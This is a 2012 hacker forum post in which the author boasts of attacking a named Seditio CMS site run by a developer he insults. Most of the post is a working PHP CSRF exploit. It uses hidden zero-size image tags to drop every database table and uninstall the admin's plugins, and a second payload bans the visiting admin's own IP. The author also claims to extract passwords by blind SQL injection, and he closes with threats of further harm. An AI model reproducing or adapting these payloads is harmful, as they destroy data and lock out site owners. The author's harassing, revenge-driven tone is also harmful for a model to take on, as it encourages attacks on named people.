I noticed that noob Kaan (unofficial Seditio CMS "developer" from seditio-eklenti.com) always abuses my 0days.
This guy is a complete n00b.
See this picture and you will understand (see especially how this noob uses htmlspecialchars()) xD
http://s019.radikal.ru/i616/1206/47/cacfcceac4d8.png
Doing that, this guy thinks he fixed the vulns lol
Do you know what is funny?))
This guy just adds @$var (aka suppress) and thinks SQL injection is fixed )))))) Bohaha)))
I thought it was really the right time to pwn this guy. There is no place for noobs like Kaan.
And somehow his database tables got dropped)) Any backups, noob?
What do you think now? It isn't a vuln?:)))
http://packetstormsecurity.org/files/111684/Seditio-165-Cross-Site-Request-Forgery-Backup-Disclosure.html
or this one:
http://packetstormsecurity.org/files/111878/Seditio-165-SQL-Injection-Denial-Of-Service.html
(Baby, I'm using it to extract passwords in a blind manner. But it is not for scriptkiddies)
Payload sent to this guy:
http://s004.radikal.ru/i208/1206/66/10557bb66505.png
<?php
error_reporting(0); // silence PHP notices so nothing but the payload is emitted
// CSRF payload: zero-size <img> tags make the victim's browser issue GET requests
// to admin.php, carrying the logged-in admin's cookies, for each table/plugin.
echo '
<img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_forum_posts" width="0" height="0" />
<img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_forum_sections" width="0" height="0" />
<img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_forum_structure" width="0" height="0" />
<img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_forum_topics" width="0" height="0" />
<img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_logger" width="0" height="0" />
<img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_pages" width="0" height="0" />
<img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_pfs_folders" width="0" height="0" />
<img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_pm" width="0" height="0" />
<img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_polls" width="0" height="0" />
<img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_polls_options" width="0" height="0" />
<img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_polls_voters" width="0" height="0" />
<img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_redirecter" width="0" height="0" />
<img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_trash" width="0" height="0" />
<img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_referers" width="0" height="0" />
<img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_auth" width="0" height="0" />
<img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_banlist" width="0" height="0" />
<img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_com" width="0" height="0" />
<img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_plugins" width="0" height="0" />
<img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_users" width="0" height="0" />
<img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_online" width="0" height="0" />
<img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_config" width="0" height="0" />
<img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_core" width="0" height="0" />
<img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_groups_users" width="0" height="0" />
<img src="http://seditio-eklenti.com//admin.php?m=dbtools&a=drop&table=sed_cache" width="0" height="0" />
<img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=Highslide_iResizer&b=uninstall" />
<img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=adminqv&b=uninstall" />
<img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=cleaner&b=uninstall" />
<img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=contact&b=uninstall" />
<img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=forumstats&b=uninstall" />
<img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=gallery&b=uninstall" />
<img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=ipsearch&b=uninstall" />
<img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=massmovetopics&b=uninstall" />
<img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=news&b=uninstall" />
<img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=passrecover&b=uninstall" />
<img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=recentitems&b=uninstall" />
<img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=search&b=uninstall" />
<img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=skineditor&b=uninstall" />
<img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=statistics&b=uninstall" />
<img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=textboxer2&b=uninstall" />
<img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=dbtools&b=uninstall" />
<img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=pmoku&b=uninstall" />
<img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=modcp&b=uninstall" />
<img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=guestbook&b=uninstall" />
<img src="http://seditio-eklenti.com/admin.php?m=plug&a=edit&pl=pmblocker_se&b=uninstall" />
';
/*
Ban Admin CSRF exploit
4 Fun
tested under seditio 165.x from seditio-eklenti.com / seditio-build170.20120302 from neocrome.net
OS: Windows XP SP2 (32 bit)
Apache: 2.2.21.0
PHP Version: 5.2.17.17
mysql> select version();
+-----------+
| version() |
+-----------+
| 5.5.21    |
+-----------+
*/
$site='http://seditio-eklenti.com';// define your target site here.
$funmsg='While you sit here I\'m banning you) Meh MeH MeH :D';// Your message here
// 300 blank lines push the payload below the visible fold; the two quickban
// requests carry uid=1 and the visiting admin's own IP address (REMOTE_ADDR).
die(str_repeat(PHP_EOL,300) .'<img src="' . $site . '/users.php?m=quickban&uid=1&ip=' . htmlentities($_SERVER['REMOTE_ADDR'])
. '&a=confirmed" width="0" height="0" />'. PHP_EOL .
'<img src="' . $site . '/plug.php?e=sfquickban&uid=1&ip=' . htmlentities($_SERVER['REMOTE_ADDR'])
. '&a=confirmed" width="0" height="0" />' .
'<h1>' . strrev($funmsg) . '</h1>');
unlink(__FILE__); // unreachable: die() above has already ended the script
?>
And obviously the database tables were dropped:
http://s019.radikal.ru/i623/1206/61/8a6bc9a41003.png
@ ALL NORMAL people: ****Do not use any SHIT from seditio-eklenti.com*****
Otherwise you will be pwned ASAP.
P.S. I'll shove it up the ass of anyone who keeps talking crap about me behind my back!
I'm coming to wreck everything the other nobodies who badmouth me behind my back have!
/AkaStep
Respect to all Black HatZ and to all brothers!
Posted 2012-06-01 (Unix timestamp 1338581128)